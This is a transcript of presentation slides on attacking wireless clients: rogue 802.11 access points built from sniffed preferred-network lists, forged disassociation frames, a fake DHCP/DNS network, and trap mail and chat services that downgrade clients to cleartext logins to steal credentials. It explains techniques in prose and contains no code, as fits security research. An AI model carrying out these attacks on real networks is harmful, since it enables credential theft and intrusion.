1 / 19

“All your layer are belong to us”

“All your layer are belong to us”. Rogue 802.11 APs, DHCP/DNS Servers, and Fake Service Traps. Agenda. Windows XP Wireless Auto Configuration (WZCSVC) Wireless Client Attack Tool Creating an ALL SSIDs network (L1) Creating a virtual network (L2+)

arsenio-manning
Download Presentation

“All your layer are belong to us”

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. “All your layer are belong to us” Rogue 802.11 APs, DHCP/DNS Servers, and Fake Service Traps

  2. Agenda • Windows XP Wireless Auto Configuration (WZCSVC) • Wireless Client Attack Tool • Creating an ALL SSIDs network (L1) • Creating a virtual network (L2+) • Exploiting client-side application vulnerabilities (L5) • Demo • All your layer are belong to us

  3. Wireless Auto Configuration Algorithm • First, Client builds list of available networks • Send broadcast Probe Request on each channel

  4. Wireless Auto Configuration Algorithm • Access Points within range respond with Probe Responses

  5. Wireless Auto Configuration Algorithm • If Probe Responses are received for networks in preferred networks list: • Connect to them in preferred networks list order • Otherwise, if no available networks match preferred networks: • Specific Probe Requests are sent for each preferred network in case networks are “hidden”

  6. Wireless Auto Configuration Algorithm • If still not associated and there is an ad-hoc network in preferred networks list, create the network and become first node • Use self-assigned IP address (169.X.Y.Z)

  7. Wireless Auto Configuration Algorithm • Finally, if “Automatically connect to non-preferred networks” is enabled (disabled by default), connect to networks in order they were detected • Otherwise, wait for user to select a network • Continue scanning for networks

  8. Attacking Wireless Auto Configuration • Attacker spoofs disassociation frame to victim • Client sends broadcast and specific Probe Requests again • Attacker discovers networks in Preferred Networks list (e.g. linksys, MegaCorp, t-mobile)

  9. Attacking Wireless Auto Configuration • Attacker creates network MegaCorp with HostAP driver

  10. Attacking Wireless Auto Configuration • Victim associates to attacker’s fake network • Even if preferred network was WEP (XP SP 0) • Attacker can supply DHCP, DNS, …, servers

  11. Wireless Auto Configuration Attacks • Attacker can join created ad-hoc network • Sniff network to discover self-assigned IP (169.X.Y.Z) and attack • Create a more Preferred Network • Spoof disassociation frames to cause clients to restart scanning process • Sniff Probe Requests to discover Preferred Networks • Create a network with SSID from Probe Request • Create a stronger signal for currently associated network • While associated to a network, clients sent Probe Requests for same network to look for stronger signal You can be 0wned while watching a DVD on a plane!

  12. A Tool to Automate the Attack • Track clients by MAC address • Identify state: scanning/associated • Record preferred networks by capturing Probe Requests • Display signal strength of packets from client • Target specific clients and create a network they will automatically associate to • Compromise client and let them rejoin original network • Connect back out over Internet to attacker • Launch worm inside corporate network • Etc. “Kismet” for wireless clients

  13. L1: Creating An ALL SSIDs Network • Can we attack multiple clients at once? • Want a network that responds to Probe Requests for any SSID • PrismII HostAP mode handles Probe Requests in firmware, doesn’t pass them to driver • Can modify driver to accept Associations for any SSID • Can use second card to sniff for Probe Requests and forge Probe Responses • Custom firmware would be better

  14. L2: Creating a FishNet • Want a network where we can observe clients in a “fishbowl” environment • Once victims associate to wireless network, will acquire a DHCP address • We run our own DHCP server • We are also the DNS server and router

  15. FishNet Services • When wireless link becomes active, client software activates and attempts to connect, reconnect, etc. without requiring user action • Our custom DNS server replies with our IP address for every query • We also run “trap” web, mail, chat services • Fingerprint client software versions • Steal credentials • Exploit client-side application vulnerabilities

  16. Fingerprinting FishNet Clients • Automatic DNS queries • wpad.domain -> Windows • _isatap -> Windows XP SP 0 • isatap.domain -> Windows XP SP 1 • teredo.ipv6.microsoft.com -> XP SP 2 • Automatic HTTP Requests • windowsupdate.com, etc. • User-Agent String reveals OS version • Passive OS fingerprinting (p0f)

  17. L5: Exploiting FishNet Clients • Fake services steal credentials • Mail and chat protocols (IMAP, POP3, AIM, YIM, MSN) • Reject authentication attempts using non-cleartext commands • Many clients automatically resort to cleartext when non-cleartext is not supported • Attack VPN clients…

  18. Client-Side Application Vulnerabilities Recent client-side vulnerabilities Microsoft JPG Processing (GDI+) Mozilla POP3 Heap Overflows GDK Pixbuf XPM Vulnerabilities … Exploits can make use of fingerprinting info

  19. DEMO

More Related